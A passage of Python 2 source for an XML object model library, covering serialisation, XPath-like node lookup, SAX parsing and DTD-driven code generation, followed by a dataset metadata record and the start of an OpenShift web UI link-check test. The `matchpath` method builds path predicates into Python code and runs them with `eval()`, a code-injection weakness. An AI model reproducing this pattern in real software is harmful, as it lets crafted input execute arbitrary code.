self._non_empty_str()\n\t\n\tdef _get_ns(self):\n\t\treturn IF(self._namespace, \"%s:\" % self._namespace, \"\")\n\n\tdef _non_empty_str(self):\n\t\ts = [\"<%s%s%s>\" % (self._get_ns(), self._name, 
self._attr_str())]\n\t\tmap(s.append, map(str, self._children))\n\t\ts.append(\"</%s%s>\" % (self._get_ns(), self._name))\n\t\treturn \"\".join(s)\n\n\tdef _empty_str(self):\n\t\treturn \"<%s%s%s />\" % (self._get_ns(), self._name, self._attr_str())\n\t\n\tdef _attr_str(self):\n\t\tattrs = map(lambda t: ' %s=\"%s\"' % t, map(lambda t: (t[0], escape(str(t[1]))), filter(lambda t: t[1] is not None, self._attribs.items())))\n\t\treturn \"\".join(attrs)\n\n\tdef emit(self, fo):\n\t\tself._verify_attributes()\n\t\tif not self.CONTENTMODEL or self.CONTENTMODEL.is_empty():\n\t\t\tfo.write(self._empty_str())\n\t\telse:\n\t\t\tfo.write(\"<%s%s%s>\" % (self._get_ns(), self._name, self._attr_str()))\n\t\t\tmap(lambda o: o.emit(fo), self._children)\n\t\t\tfo.write(\"</%s%s>\" % (self._get_ns(), self._name))\n\n\t# methods for node path manipulation\n\tdef pathname(self):\n\t\t\"\"\"pathname() returns the ElementNode as a string in xpath format.\"\"\"\n\t\tif self._attribs:\n\t\t\ts = map(lambda i: \"@%s='%s'\" % (i[0],i[1]), self._attribs.items())\n\t\t\treturn \"%s[%s]\" % (self.__class__.__name__, \" and \".join(s))\n\t\telse:\n\t\t\treturn self.__class__.__name__\n\n\tdef fullpath(self):\n\t\t\"\"\"fullpath() returns the ElementNode's full path as a string in xpath format.\"\"\"\n\t\tif self._parent:\n\t\t\tbase = self._parent.fullpath()\n\t\telse:\n\t\t\tbase = \"\"\n\t\treturn \"%s/%s\" % (base, self.pathname() )\n\n\tdef matchpath(self, pathelement):\n\t\tif \"[\" not in pathelement:\n\t\t\treturn pathelement == self._name\n\t\telse:\n\t\t\txpath_re = re.compile(r'(\\w*)(\\[.*])')\n\t\t\tmo = xpath_re.match(pathelement)\n\t\t\tif mo:\n\t\t\t\tname, match = mo.groups()\n\t\t\t\tmatch = match.replace(\"@\", \"self.\")\n\t\t\t\tmatch = match.replace(\"=\", \"==\")\n\t\t\t\treturn (name == self._name and eval(match[1:-1]))\n\t\t\telse:\n\t\t\t\traise ValueError, \"Invalid path element\"\n\n\tdef find_elements(self, pathelement):\n\t\trv = []\n\t\tfor child in self._children:\n\t\t\tif child.matchpath(pathelement):\n\t\t\t\trv.append(child)\n\t\treturn rv\n\t\n\tdef get_element(self, pathelement):\n\t\tfor child in self._children:\n\t\t\tif child.matchpath(pathelement):\n\t\t\t\treturn child\n\t\treturn None\n\n\tdef elements(self, elclass):\n\t\t\"\"\"Return iterator that iterates over list of elements matching elclass\"\"\"\n\t\treturn NodeIterator(self, elclass)\n\n\tdef _find_node(self, eltype, collect=None):\n\t\tif collect is None:\n\t\t\tcollection = []\n\t\telse:\n\t\t\tcollection = collect # should be a list\n\t\tfor el in self._children:\n\t\t\tif el.has_children():\n\t\t\t\tel._find_node(eltype, collection)\n\t\t\tif isinstance(el, eltype):\n\t\t\t\tcollection.append(el)\n\t\treturn collection\n\n\tdef find(self, elclass, **attribs):\n\t\tfor obj in self._children:\n\t\t\tif isinstance(obj, elclass):\n\t\t\t\tif self._attribs_match(obj, attribs):\n\t\t\t\t\treturn obj\n\t\treturn None\n\n\tdef getall(self, elclass, depth=0, collect=None):\n\t\tif collect is None:\n\t\t\trv = []\n\t\telse:\n\t\t\trv = collect # should be a list\n\t\tfor el in self._children:\n\t\t\tif isinstance(el, elclass):\n\t\t\t\trv.append(el)\n\t\t\tif depth > 0:\n\t\t\t\tel.getall(elclass, depth-1, rv)\n\t\treturn rv\n\n\tdef _attribs_match(self, obj, attribdict):\n\t\tfor tname, tval in attribdict.items():\n\t\t\ttry:\n\t\t\t\tif getattr(obj, tname) != tval:\n\t\t\t\t\treturn 0\n\t\t\texcept AttributeError:\n\t\t\t\treturn 0\n\t\treturn 1\n\n\t# XPath-like functions\n\tdef comment(self):\n\t\treturn 
self._find_node(Comment)\n\n\tdef text(self):\n\t\treturn self._find_node(Text)\n\n\tdef processing_instruction(self):\n\t\treturn self._find_node(ProcessingInstruction)\n\t\n\tdef node(self):\n\t\treturn self._find_node(ElementNode)\n\n\nclass NodeIterator(object):\n\tdef __init__(self, node, elclass):\n\t\tself.node = node\n\t\tself.elclass = elclass\n\t\tself.i = 0\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef next(self):\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tn = self.node[self.i]\n\t\t\texcept IndexError:\n\t\t\t\traise StopIteration\n\t\t\tself.i += 1\n\t\t\tif isinstance(n, self.elclass):\n\t\t\t\tbreak\n\t\treturn n\n\n\ndef find_nodes(node, elclass):\n\tif isinstance(node, elclass):\n\t\tyield node\n\tfor child in node.get_children():\n\t\tfor cn in find_nodes(child, elclass):\n\t\t\tyield cn\n\treturn\n\n\nclass Fragments(ElementNode):\n\t"""Fragments is a special holder class to hold 'loose' markup fragments.\n\tThat is, bits of markup that don't have a common container (e.g. not in\n\troot element). It is invisible."""\n\tdef __str__(self):\n\t\ts = []\n\t\tmap(s.append, map(str, self._children))\n\t\treturn "".join(s)\n\n\tdef emit(self, fo):\n\t\tmap(lambda o: o.emit(fo), self._children)\n\n\nclass POMString(unicode):\n\tdef __new__(cls, arg, enc=None):\n\t\tif type(arg) is unicode:\n\t\t\treturn unicode.__new__(cls, arg)\n\t\tif not enc:\n\t\t\tenc = sys.getdefaultencoding()\n\t\treturn unicode.__new__(cls, arg, enc)\n\n\nclass POMTimeStamp(long):\n\tpass\n\n\nclass BeautifulWriter(object):\n\t"""A wrapper for a file-like object that is itself a file-like object. It\n\tis basically a shim. It attempts to beautify the XML stream emitted by the\n\tPOM tree. Pass one of these to the emit method if you want better looking\n\toutput."""\n\tdef __init__(self, fo, inline=[]):\n\t\tself._fo = fo # the wrapped file object\n\t\tself._inline = list(inline) # list of special tags that are inline\n\t\tself._level = 0\n\t\tself._tagre = re.compile(r"<([-a-zA-Z0-9_:]+)") # start tag\n\tdef __getattr__(self, name):\n\t\treturn getattr(self._fo, name)\n\n\tdef write(self, data):\n\t\tif data.endswith("/>"):\n\t\t\tself._fo.write("\\n"+" "*self._level)\n\t\t\treturn self._fo.write(data)\n\t\tif data.startswith("</"):\n\t\t\tself._level -= 1\n\t\t\tself._fo.write("\\n"+" "*self._level)\n\t\t\treturn self._fo.write(data)\n\t\tmo = self._tagre.search(data)\n\t\tif mo:\n\t\t\tif str(mo.group(1)) in self._inline:\n\t\t\t\treturn self._fo.write(data)\n\t\t\telse:\n\t\t\t\tself._fo.write("\\n"+" "*self._level)\n\t\t\t\tself._level += 1\n\t\t\t\treturn self._fo.write(data)\n\t\treturn self._fo.write(data)\n\n\n# base class for whole POM documents, including Header.\nclass POMDocument(object):\n\tDOCTYPE = "\\n"\n\tXMLHEADER = '<?xml version="1.0" encoding="%s"?>\\n' %(DEFAULT_ENCODING,) # default\n\tdef __init__(self, dtd=None, encoding=None):\n\t\tself.dtds = []\n\t\tself._getters = []\n\t\tself.root = None\n\t\tself.parser = None\n\t\tself.dirty = 0\n\t\tif encoding:\n\t\t\tself.set_encoding(encoding)\n\t\tif dtd:\n\t\t\tself.add_dtd(dtd)\n\n\tdef __str__(self):\n\t\treturn self.XMLHEADER + self.DOCTYPE + str(self.root) + "\\n"\n\n\tdef emit(self, fo):\n\t\tfo.write(self.XMLHEADER)\n\t\tfo.write(self.DOCTYPE)\n\t\tfo.write("\\n")\n\t\tself.root.emit(fo)\n\t\tfo.write("\\n")\n\n\tdef set_dirty(self, val=1):\n\t\tself.dirty = val\n\n\tdef set_root(self, root):\n\t\t"""Forcibly set the root document. 
Be careful with this.\"\"\"\n\t\tif isinstance(root, ElementNode):\n\t\t\tself.root = root\n\t\telse:\n\t\t\traise ValueError, \"root document must be POM ElementNode.\"\n\n\tdef add_dtd(self, dtdmod):\n\t\tself.dtds.append(dtdmod)\n\t\tself._getters.append(get_getter(dtdmod))\n\n\tdef get_elementnode(self, name):\n\t\tfor getter in self._getters:\n\t\t\ttry:\n\t\t\t\treturn getter(name)\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\t\n\tdef set_encoding(self, encoding):\n\t\t# verify encoding is valid\n\t\timport codecs\n\t\ttry:\n\t\t\tcodecs.lookup(encoding)\n\t\texcept codecs.LookupError, err:\n\t\t\traise ValueError, err.args[0]\n\t\tself.XMLHEADER = '<?xml version=\"1.0\" encoding=\"%s\"?>\\n' %(encoding,)\n\t\tself.encoding = encoding\n\t\n\tdef set_doctype(self, doctype):\n\t\tself.DOCTYPE = str(doctype)\n\n\tdef get_parser(self, handlerclass=None):\n\t\tself.parser = get_parser(self.dtds, handlerclass or ObjectParserHandler, self._callback)\n\t\treturn self.parser\n\t\n\tdef del_parser(self):\n\t\tself.parser = None\n\n\tdef _callback(self, doc):\n\t\tself.root = doc\n\t\tself.dirty = 0\n\t\n\tdef parse(self, url, handlerclass=None):\n\t\tif not self.parser:\n\t\t\tself.get_parser(handlerclass or ObjectParserHandler)\n\t\tself.parser.parse(url)\n\t\tself.del_parser()\n\n\tdef parseFile(self, fo, handlerclass=None):\n\t\tif not self.parser:\n\t\t\tself.get_parser(handlerclass or ObjectParserHandler)\n\t\tself.parser.parseFile(fo)\n\t\tself.del_parser()\n\n\tdef parseString(self, string, handlerclass=None):\n\t\tif not self.parser:\n\t\t\tself.get_parser(handlerclass or ObjectParserHandler)\n\t\tself.parser.parseFile(StringIO(string))\n\n\tdef write_xmlfile(self, filename=None):\n\t\tfilename = filename or self.filename\n\t\tif filename:\n\t\t\tfo = open(os.path.expanduser(filename), \"w\")\n\t\t\ttry:\n\t\t\t\tself.emit(fo)\n\t\t\tfinally:\n\t\t\t\tfo.close()\n\t\tself.dirty = 0\n\twritefile = write_xmlfile\n\n\tdef writefileobject(self, fo):\n\t\tself.emit(fo)\n\n\tdef get_document(self, filename):\n\t\tself.get_parser()\n\t\tself.parse(filename)\n\t\tself.filename = filename\n\t\n\tdef getnode(self, path):\n\t\t\"\"\"getnode(path) Returns an ElementNode addressed by the path.\"\"\"\n\t\telements = path.split(\"/\")\n\t\twhile not elements[0]: # eat empty first element\n\t\t\telements.pop(0)\n\t\tnode = self.root\n\t\tpathelement = elements.pop(0)\n\t\tif node.matchpath(pathelement):\n\t\t\twhile elements:\n\t\t\t\tpathelement = elements.pop(0)\n\t\t\t\tnode = node.get_element(pathelement)\n\t\t\t\tif node is None:\n\t\t\t\t\traise IndexError, \"path element not found\"\n\t\t\treturn node\n\t\telse:\n\t\t\traise IndexError, \"first path element not found\"\n\n\tdef setnode(self, path, text):\n\t\tnode = self.getnode(path)\n\t\tnode.replace_text(text)\n\t\n\tdef delnode(self, path):\n\t\tels = path.split(\"/\")\n\t\tpath, endnode = \"/\".join(els[:-1]), els[-1]\n\t\tnode = self.getnode(path)\n\t\tdel node[endnode]\n\t\n\tdef addnode(self, basepath, newnode):\n\t\tnode = self.getnode(basepath)\n\t\tnode.append(newnode)\n\n\tdef add_text(self, basepath, text, encoding=None):\n\t\tnode = self.getnode(basepath)\n\t\tnode.add_text(text, encoding or self.encoding)\n\n\tdef _write_text(self, fo, node):\n\t\tfor n in node:\n\t\t\tif isinstance(n, Text):\n\t\t\t\tfo.write(n.fullpath())\n\t\t\t\tfo.write(\"\\n\")\n\t\t\telse:\n\t\t\t\tself._write_text(fo, n)\n\t\t\n\tdef write_paths(self, fileobject):\n\t\trealfile = 0\n\t\tif type(fileobject) is str:\n\t\t\tfileobject = open(fileobject, 
\"w\")\n\t\t\trealfile = 1\n\t\tself._write_text(fileobject, self.root)\n\t\tif realfile:\n\t\t\tfileobject.close()\n\n# parses XML files into a POM object model. A callback function is then called \n# with this object model as a parameter.\nclass ObjectParserHandler(object):\n\tdef __init__(self, callback, module=None):\n\t\tself.stack = []\n\t\tself.msg = None\n\t\tself.callback = callback # gets called when message fully parsed. The\n\t\t                         # argument is the toplevel message object.\n\t\tself.modules = []\n\t\tif module is not None:\n\t\t\tif type(module) is list:\n\t\t\t\tself.modules.extend(module)\n\t\t\telse:\n\t\t\t\tself.modules.append(module)\n\n\tdef add_module(self, module):\n\t\tself.modules.append(module)\n\n\tdef _get_class(self, name):\n\t\tklass = None\n\t\tfor mod in self.modules:\n\t\t\ttry:\n\t\t\t\tklass = getattr(mod, identifier(name)) # name dtd compiler translated to\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\t\t\tif klass:\n\t\t\t\treturn klass\n\t\traise AttributeError\n\n\tdef startDocument(self):\n\t\tself.stack = []\n\n\tdef endDocument(self):\n\t\tif self.stack: # stack should be empty now\n\t\t\traise ValidationError, "unbalanced document!"\n\t\tself.callback(self.msg)\n\t\tself.msg = None\n\n\tdef startElement(self, name, atts):\n\t\t"Handle an event for the beginning of an element."\n\t\ttry:\n\t\t\tklass = self._get_class(name)\n\t\texcept AttributeError:\n\t\t\traise ValidationError, "Undefined element tag: "+name\n\t\tattr = {} # atts is an instance with unicode keys.. must convert to str..\n\t\tdef fixatts(t):\n\t\t\tattr[str(t[0])] = unescape(str(t[1]))\n\t\tmap(fixatts, atts.items())\n\t\tobj = apply(klass, (), attr)\n\t\tself.stack.append(obj)\n\n\tdef endElement(self, name):\n\t\t"Handle an event for the end of an element."\n\t\tobj = self.stack.pop()\n\t\tif self.stack:\n\t\t\tself.stack[-1].append(obj)\n\t\telse:\n\t\t\tself.msg = obj\n\n\tdef characters(self, ch, start, length):\n\t\tif self.stack:\n\t\t\ttext = ch[start:start+length]\n\t\t\ttext = text.strip()\n\t\t\tif text:\n\t\t\t\tself.stack[-1].append(Text(text))\n\t\t\n\tdef ignorableWhitespace(self, ch, start, length):\n\t\tpass\n\tdef processingInstruction(self, target, data):\n\t\t"Handle a processing instruction event."\n\t\tprint "unhandled processing instruction:", target, data\n\tdef setDocumentLocator(self, locator):\n\t\t"Receive an object for locating the origin of SAX document events."\n\t\tpass\n\n\ndef _default_parser_callback(obj):\n\tobj.emit(sys.stdout)\n\ndef get_parser(dtdmodules, handlerclass=ObjectParserHandler, callback=_default_parser_callback):\n\tfrom xml.sax import saxexts\n\thandler = handlerclass(callback, dtdmodules)\n\tparser = saxexts.make_parser()\n\tparser.setDocumentHandler(handler)\n\treturn parser\n\ndef parseString(string, dtdmodules, handlerclass=ObjectParserHandler, callback=_default_parser_callback):\n\tparser = get_parser(dtdmodules, handlerclass, callback)\n\tparser.parseFile(StringIO(string))\n\ndef get_dtd_compiler(fo, mixinmodule=None):\n\tglobal sourcegen\n\timport sourcegen\n\tfrom xml.parsers.xmlproc.dtdparser import DTDParser\n\tgenerator = sourcegen.get_sourcefile(fo)\n\tdh = DTDConsumerForSourceGeneration(generator, mixinmodule)\n\tparser = DTDParser()\n\tparser.set_dtd_consumer(dh)\n\treturn parser\n\n\n# xml helper classes, used in both generation and operation\n# They are instantiated during compilation to generate themselves. 
\n# Then, when imported by the user from the dtds package, are used normally.\nclass ContentModel(object):\n\t"""Represents and validates a content model. """\n\tdef __init__(self, rawmodel=None):\n\t\tself.model = rawmodel # XXX\n\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn "%s.%s(%r)" % (cl.__module__, cl.__name__, self.model)\n\n\tdef is_empty(self):\n\t\treturn not self.model\n\n\nclass _ContentModelGenerator(object):\n\t"""_ContentModelGenerator(rawmodel)\n\tThe DTD parser generated and final content model are so different that a\n\tdifferent content model generator is used for this object.\n\n\t"""\n\tdef __init__(self, rawmodel=None):\n\t\ttm_type = type(rawmodel)\n\t\tif tm_type is str:\n\t\t\tif rawmodel == "EMPTY":\n\t\t\t\tself.model = EMPTY\n\t\t\telif rawmodel == "#PCDATA":\n\t\t\t\tself.model = PCDATA\n\t\t\telif rawmodel == "ANY":\n\t\t\t\tself.model = ANY\n\t\t\telse:\n\t\t\t\traise ValidationError, "ContentModelGenerator: unknown special type"\n\t\telif tm_type is tuple:\n\t\t\tself.model = (ANY,) # rawmodel # XXX\n\t\telif tm_type is type(None):\n\t\t\tself.model = None\n\t\telse:\n\t\t\traise RuntimeError, "unknown content model format"\n\n\tdef __repr__(self):\n\t\treturn "%s.%s(%r)" % (ContentModel.__module__, ContentModel.__name__, self.model)\n\n\nclass Enumeration(list):\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn "%s.%s(%s)" % (cl.__module__, cl.__name__, list.__repr__(self))\n\tdef __str__(self):\n\t\treturn "(%s)" % ", ".join(map(repr, self))\n\nclass AttributeList(list):\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn "%s.%s(%s)" % (cl.__module__, cl.__name__, list.__repr__(self))\n\tdef __str__(self):\n\t\treturn " ".join(map(str, self))\n\nclass _AttributeType(str):\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn "%s.%s(%s)" % (cl.__module__, cl.__name__, self)\n\nclass IDREFS(AttributeList):\n\tdef add_ref(self, value):\n\t\tself.append(IDREF(value))\n\nclass ENTITIES(AttributeList):\n\tpass\nclass NMTOKENS(AttributeList):\n\tpass\n\nclass CDATA(_AttributeType):\n\tpass\nclass ID(_AttributeType):\n\tpass\nclass IDREF(_AttributeType):\n\tpass\nclass NMTOKEN(_AttributeType):\n\tpass\nclass ENTITY(_AttributeType):\n\tpass\n\n\nPCDATA = Text\nANY = True\nEMPTY = None\n\n# enumerations\nAT_CDATA = 1\nAT_ID = 2\nAT_IDREF = 3\nAT_IDREFS = 4\nAT_ENTITY = 5\nAT_ENTITIES = 6\nAT_NMTOKEN = 7\nAT_NMTOKENS = 8\n\nREQUIRED = 11 # attribute is mandatory\nIMPLIED = 12 # inherited from environment if not specified\nDEFAULT = 13 # default value for enumerated types (added by parser)\nFIXED = 14 # always the same, fixed, value.\n\n_ATTRTYPEMAP = {\n\t"CDATA": AT_CDATA,\n\t"ID": AT_ID,\n\t"IDREF": AT_IDREF,\n\t"IDREFS": AT_IDREFS,\n\t"ENTITY": AT_ENTITY,\n\t"ENTITIES": AT_ENTITIES,\n\t"NMTOKEN": AT_NMTOKEN,\n\t"NMTOKENS": AT_NMTOKENS\n}\n\n_ATTRCLASSMAP = {\n\tAT_CDATA: CDATA,\n\tAT_ID: ID,\n\tAT_IDREF: IDREF,\n\tAT_IDREFS: IDREFS,\n\tAT_ENTITY: ENTITY,\n\tAT_ENTITIES: ENTITIES,\n\tAT_NMTOKEN: NMTOKEN,\n\tAT_NMTOKENS: NMTOKENS\n}\n\n_DEFAULTMAP = {\n\tu'#REQUIRED': REQUIRED,\n\tu'#IMPLIED': IMPLIED,\n\tu'#DEFAULT': DEFAULT,\n\tu'#FIXED': FIXED,\n}\n\nclass XMLAttribute(object):\n\tdef __init__(self, name, a_type, a_decl, a_def=None):\n\t\tself.name = str(name)\n\t\ta_type_type = type(a_type)\n\t\t#a_decl_type = type(a_decl)\n\t\tif a_type_type is unicode: # from the parser\n\t\t\tself.a_type = _ATTRTYPEMAP.get(str(a_type), a_type)\n#\t\telif a_type_type is tuple or 
a_type_type is list:\n#\t\t\tself.a_type = a_type # XXX\n\t\telif a_type_type is int: # from the generated file\n\t\t\tself.a_type = _ATTRCLASSMAP.get(a_type, a_type)\n\t\telif a_type_type is list:\n\t\t\tself.a_type = Enumeration(map(str, a_type))\n\t\telse:\n\t\t\tself.a_type = a_type\n\t\t# declaration\n\t\t# convert string to int value when generating, just use the int when imported from Python dtd format.\n\t\tself.a_decl = _DEFAULTMAP.get(a_decl, a_decl)\n\t\tself.default = a_def\n\t\t# save the type to speed verify\n\t\tself.a_type_type = type(self.a_type)\n\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn "%s.%s(%r, %r, %r, %r)" % (cl.__module__, cl.__name__, self.name, self.a_type, self.a_decl, self.default)\n\n\tdef verify(self, value):\n\t\tif issubclass(type(self.a_type), list):\n\t\t\tif value not in self.a_type:\n\t\t\t\traise ValidationError, "Enumeration has wrong value. %s is not one of %r." % (value, self.a_type)\n\t\telif self.a_decl == FIXED:\n\t\t\tif value != self.default:\n\t\t\t\traise ValidationError, "Bad value for FIXED attribute. %r must be %r." % (value, self.default)\n\t\treturn True\n\n\n# this DTD parser consumer generates the Python source code from the DTD. \nclass DTDConsumerForSourceGeneration(object):\n\tdef __init__(self, generator, mixins=None):\n\t\tself.generator = generator\n\t\tself.elements = {}\n\t\tself.parameter_entities = {}\n\t\tself.general_entities = {}\n\t\tself.mixins = mixins # should be a module object\n\n\tdef dtd_start(self):\n\t\tprint "Starting to parse DTD...",\n\t\tself.generator.add_comment("This file generated by a program. do not edit.")\n\t\tself.generator.add_import(sys.modules[__name__])\n\t\tif self.mixins:\n\t\t\tself.generator.add_import(self.mixins)\n\n\tdef dtd_end(self):\n\t\tprint "done parsing. Writing file."\n\t\tself.generator.write()\n\n\tdef new_element_type(self, elem_name, elem_cont):\n\t\t"Receives the declaration of an element type."\n\t\ttry:\n\t\t\telement = self.elements[elem_name]\n\t\texcept KeyError:\n\t\t\tparents = [ElementNode]\n\t\t\tmixinname = "%sMixin" % ( elem_name )\n\t\t\tif self.mixins and hasattr(self.mixins, mixinname):\n\t\t\t\tparents.insert(0, getattr(self.mixins, mixinname))\n\t\t\t# class name is capitalized to avoid clashes with Python key words.\n\t\t\tch = self.generator.add_class(identifier(elem_name), tuple(parents))\n\t\t\tch.add_attribute("_name", elem_name)\n\t\t\tch.add_attribute("CONTENTMODEL", _ContentModelGenerator(elem_cont))\n\t\t\tself.elements[elem_name] = ch\n\t\t\t\n\tdef new_attribute(self, elem, attr, a_type, a_decl, a_def):\n\t\t"Receives the declaration of a new attribute."\n\t\ttry:\n\t\t\telement = self.elements[elem]\n\t\texcept KeyError:\n\t\t\traise ValidationError, "attribute defined before element!"\n\t\ttry:\n\t\t\tattlist = element.get_attribute("ATTLIST")\n\t\texcept KeyError:\n\t\t\telement.add_attribute("ATTLIST", AttributeList())\n\t\t\tattlist = element.get_attribute("ATTLIST")\n\t\tattlist.append(XMLAttribute(attr, a_type, a_decl, a_def))\n\n\tdef handle_comment(self, contents):\n\t\t"Receives the contents of a comment."\n\t\tself.generator.add_comment(contents)\n\n\tdef new_parameter_entity(self,name,val):\n\t\t"Receives internal parameter entity declarations."\n\t\t# these are handled internally by the DTD parser. but.. 
save it anyway.\n\t\tself.parameter_entities[name] = val\n\t\n\tdef new_external_pe(self, name, pubid, sysid):\n\t\t"Receives external parameter entity declarations."\n\t\t# these are handled internally by the DTD parser.\n\t\n\tdef new_general_entity(self,name,val):\n\t\t"Receives internal general entity declarations."\n\t\tself.general_entities[name] = val\n\t\t# XXX do we need to handle this?\n\t\t#print "XXX general entity:"\n\t\t#print name, val\n\n\tdef new_external_entity(self, ent_name, pub_id, sys_id, ndata):\n\t\t"""Receives external general entity declarations. 'ndata' is the\n\t\tempty string if the entity is parsed."""\n\t\t# XXX do we need to handle this?\n\t\tprint "XXX external entity:"\n\t\tprint ent_name, pub_id, sys_id, ndata\n\n\tdef new_notation(self,name,pubid,sysid):\n\t\t"Receives notation declarations."\n\t\t# XXX do we need to handle this?\n\t\tprint "XXX unhandled notation:",\n\t\tprint name, pubid, sysid\n\n\tdef handle_pi(self, target, data):\n\t\t"Receives the target and data of processing instructions."\n\t\t# XXX do we need to handle this?\n\t\tprint "XXX unhandled PI:",\n\t\tprint target, data\n\n#########################################################\n# Utility functions\n#########################################################\n\ndef get_mod_file(sourcefilename):\n\t"""get_mod_file(sourcefilename)\n\tConverts a file name into a file name inside the dtds package. This file\n\tname is the destination for generated python files.\n\t"""\n\timport dtds\n\tmodname = os.path.splitext(os.path.split(sourcefilename)[1])[0]\n\treturn os.path.join(dtds.__path__[0], modname.translate(maketrans("-. ", "___"))+".py")\n\n\ndef _find_element(elname, modules):\n\tfor mod in modules:\n\t\ttry:\n\t\t\treturn getattr(mod, elname)\n\t\texcept AttributeError:\n\t\t\tcontinue\n\treturn None\n\ndef _construct_node(name, modules):\n\tif "[" not in name:\n\t\tnc = _find_element(name, modules)\n\t\tif nc is None:\n\t\t\traise ValidationError, "no such element name in modules"\n\t\treturn nc() # node\n\telse:\n\t\txpath_re = re.compile(r'(\w*)(\[.*])')\n\t\tmo = xpath_re.match(name)\n\t\tif mo:\n\t\t\tattdict = {}\n\t\t\tename, attribs = mo.groups()\n\t\t\tnc = _find_element(ename, modules)\n\t\t\tif nc is None:\n\t\t\t\traise ValidationError, "no such element name in modules"\n\t\t\tattribs = attribs[1:-1].split("and") # chop brackets and split on 'and'\n\t\t\tattribs = map(str.strip, attribs) # strip whitespace\n\t\t\tfor att in attribs: # dict elements are name and value\n\t\t\t\tname, val = att.split("=")\n\t\t\t\tattdict[name[1:]] = val[1:-1]\n\t\treturn apply(nc, (), attdict)\n\n\ndef make_node(path, modules, value=None):\n\t"""make_node(path, modules, [value])\n\tMakes a node or an XML fragment given a path, element module list, and an\n\toptional value.\n\t"""\n\tif type(modules) is not list:\n\t\tmodules = [modules]\n\tpathelements = path.split("/")\n\tif not pathelements[0]: # delete possible empty root node\n\t\tdel pathelements[0]\n\trootnode = current = _construct_node(pathelements[0], modules)\n\tfor element in pathelements[1:]:\n\t\tnew = _construct_node(element, modules)\n\t\tcurrent.append(new)\n\t\tcurrent = new\n\tcurrent.set_inline()\n\tif value is not None:\n\t\tcurrent.add_text(value)\n\treturn rootnode\n\t\ndef unescape(s):\n\tif '&' not in s:\n\t\treturn s\n\ts = s.replace("&lt;", "<")\n\ts = s.replace("&gt;", ">")\n#\ts = s.replace("&apos;", "'")\n\ts = s.replace("&quot;", '"')\n\ts = 
s.replace(\"&amp;\", \"&\") # Must be last\n\treturn s\n\ndef escape(s):\n\ts = s.replace(\"&\", \"&amp;\") # Must be first\n\ts = s.replace(\"<\", \"&lt;\")\n\ts = s.replace(\">\", \"&gt;\")\n#\ts = s.replace(\"'\", \"&apos;\")\n\ts = s.replace('\"', \"&quot;\")\n\treturn s\n\n# self test\nif __name__ == \"__main__\":\n\tpass\n\t# note: running this script as __main__ will not generate valid source code. \n\t# Use the dtd2py script for that.\n\t#dtdp = get_dtd_compiler(sys.stdout)\n\t#dtdp.parse_resource(FILE)\n#\toutfile.close()\n#\tprint Comment(\"some ------- comment-\")\n#\tprint repr(POMString(u'This is a test.'))\n#\tprint repr(POMString(u'This is a test.', 'utf-8'))\n#\tprint repr(POMString('This is a test.', 'utf-8'))\n#\timport dtds.xhtml1_strict\n#\tdoc = POMDocument(dtds.xhtml1_strict)\n#\tdoc.set_root(doc.get_elementnode(\"html\")())\n#\tprint doc\n\n" }, { "alpha_fraction": 0.5683290362358093, "alphanum_fraction": 0.5829015374183655, "avg_line_length": 31.840425491333008, "blob_id": "a8834e4d012a0aad657c27f7ec098e9391e93b41", "content_id": "3a8b08b025b833c449855ca3a05f39d953db5290", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3088, "license_type": "no_license", "max_line_length": 101, "num_lines": 94, "path": "/automation/open/testmodules/UI/web/CheckHomeContent.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n#\n# File name: CheckHomeContent.py\n# Date: 2012/06/29 10:56\n# Author: [email protected] \n#\n\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass Demo01(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n        web.go_to_home()\n        #web.go_to_signin()\n        #web.login()\n        web.assert_text_equal_by_xpath('LEARN MORE',\n            '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n        web.assert_text_equal_by_xpath('GET STARTED',\n            '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n        web.assert_text_equal_by_xpath('DEVELOPERS',\n            '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n        web.assert_text_equal_by_xpath('COMMUNITY',\n            '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[5]/a/span''')\n\n        #check whether the links are correct\n        #LEARN MORE\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n        web.assert_text_equal_by_xpath('What is OpenShift?',\n            '''/html/body/div[@id='content']/div/div/div/div/div/h1''',\n            '`LEARN MORE` page is missing')\n\n        #GET STARTED\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n        web.assert_text_equal_by_xpath('Get Started with OpenShift',\n            '''/html/body/div[@id='content']/div/div/div/div/div/h1''',\n            'Get Started page is missing')\n\n        #LOGO\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/div/a/div[1]''')\n        web.assert_text_equal_by_xpath('BUZZ',\n            '''/html/body/div[@id='buzz']/div/div/div/div/h2/strong''',\n            'Check the Buzz part is missing')\n\n        #DEVELOPERS\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n        web.assert_text_equal_by_xpath('Developer Center',\n            '''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div[1]''',\n            'Developers page is missing')\n\n        #COMMUNITY\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[5]/a/span''')\n        
